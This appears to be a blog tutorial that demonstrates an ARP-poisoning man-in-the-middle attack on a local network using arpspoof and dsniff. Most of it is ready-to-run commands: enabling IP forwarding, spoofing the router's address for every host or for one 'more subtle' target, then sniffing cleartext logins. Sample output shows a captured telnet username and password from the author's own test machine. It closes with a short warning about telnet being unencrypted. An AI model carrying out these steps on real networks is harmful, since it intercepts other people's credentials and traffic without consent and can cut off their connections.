First we need modify the repositories. I'm using sudo -i which switches me to root so I don't have type sudo before every command.
ubuntu@ubuntu:~$ sudo -i
root@ubuntu:~# vi /etc/apt/sources.list
I uncommented the following lines at the end of the file.
deb http://archive.ubuntu.com/ubuntu hardy universe
deb-src http://archive.ubuntu.com/ubuntu hardy universe
deb http://archive.ubuntu.com/ubuntu hardy-updates universe
deb-src http://archive.ubuntu.com/ubuntu hardy-updates universe
deb http://archive.ubuntu.com/ubuntu hardy-security universe
deb-src http://archive.ubuntu.com/ubuntu hardy-security universe
Then install dsniff
root@ubuntu:~# apt-get -y install dsniff
Enabling IP forwarding will allow us to forward the traffic to the actually router otherwise we would effectively kill our target's internet connection. We don't want to do that we want to forward the traffic and sniff it looking for usernames & passwords.
root@ubuntu:~# cat /proc/sys/net/ipv4/ip_forward
0
root@ubuntu:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@ubuntu:~# !cat
cat /proc/sys/net/ipv4/ip_forward
1
Now to poison everyone on our network. If your machine can't handle the traffic on this network segment then you could possible slow it down or kill everyones internet. Arpsoof is part of the dsniff package.
root@ubuntu:~# arpspoof -i eth0 172.16.0.1
We could do a single target which would be a bit more subtle with the following
root@ubuntu:~# arpspoof -i eth0 -t 172.16.0.10 172.16.0.1
You should see packets similar to the following.
0:c:29:e5:f3:80 ff:ff:ff:ff:ff:ff 0806 42: arp reply 172.16.0.1 is-at 0:c:29:e5:f3:80
0:c:29:e5:f3:80 ff:ff:ff:ff:ff:ff 0806 42: arp reply 172.16.0.1 is-at 0:c:29:e5:f3:80
If I look on my XP box at my arp cache.
C:\Documents and Settings\Administrator>arp -a
Interface: 172.16.0.10 --- 0x2
Internet Address Physical Address Type
172.16.0.1 00-0c-29-e5-f3-80 dynamic
172.16.0.106 00-0c-29-e5-f3-80 dynamic
Notice the router (172.16.0.1) has the Ubuntu's MAC address.
Now we need something to sniff it. This is where dsniff comes in.
root@ubuntu:~# dsniff -cmni eth0
dsniff: listening on eth0
-----------------
10/04/08 16:06:37 tcp 172.16.0.10.1805 -> 172.16.0.1.23 (telnet)
dj
test
ls
echo w00t
exit
The first line is the usrname (dj) and then the password (test). The rest are the command I was typing. One more reason you shouldn't use telnet because it's a clear text protocol, nothing is encrypted.
Pess ctrl+c to kill arpspoof & dsniff. You'll notice arpspoof will actually fix the target's ARP table so we don't break their internet.
No comments:
Post a Comment